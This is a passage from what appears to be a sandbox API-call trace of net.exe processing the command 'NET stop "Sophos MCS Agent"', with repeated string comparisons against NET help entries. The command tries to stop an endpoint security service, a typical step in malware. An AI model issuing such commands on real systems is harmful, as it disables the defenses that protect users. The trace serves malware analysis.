MCS AgentΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x11 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x12 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x1f) returned 14 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xf [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x1f) returned 14 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x17 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1f) returned 14 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x18 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1f) returned 14 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x2a [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | ", _MaxCount=0x1f) returned 14 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 19 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x58 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /", _MaxCount=0x1f) returned -1 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x184 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\co", _MaxCount=0x1f) returned -2 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc7 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET USER\r\n[username [password |", _MaxCount=0x1f) returned -2 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x47 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CAC", _MaxCount=0x1f) returned -3 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc2 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER ", _MaxCount=0x1f) returned 19 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x319 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="SERVICES\r\nNET START can be used", _MaxCount=0x1f) returned -5 [0217.854] LocalFree (hMem=0x605620) returned 0x0 [0217.854] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x483 [0217.854] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="SYNTAX\r\nThe following conventio", _MaxCount=0x1f) returned -5 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xa86 [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NAMES\r\nThe following types of n", _MaxCount=0x1f) returned 4 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x54 [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="\r\nFor more information on tools", _MaxCount=0x1f) returned 97 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xad [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x2e [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x7d [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x26 [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x1b [0217.855] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0217.855] LocalFree (hMem=0x605620) returned 0x0 [0217.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xbe [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc1 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x16 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x234 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x13 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x16) returned 14 [0217.856] LocalFree (hMem=0x605620) returned 0x0 [0217.856] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.856] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START MESSENGER\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START NET LOGON\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x16 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x11 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x12 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xf [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x17 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x18 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x2a [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0217.857] LocalFree (hMem=0x605620) returned 0x0 [0217.857] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x58 [0217.857] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x184 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc7 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x47 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc2 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x319 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x483 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xa86 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x54 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xad [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x2e [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x7d [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0217.858] LocalFree (hMem=0x605620) returned 0x0 [0217.858] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x26 [0217.858] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x1b [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xbe [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: 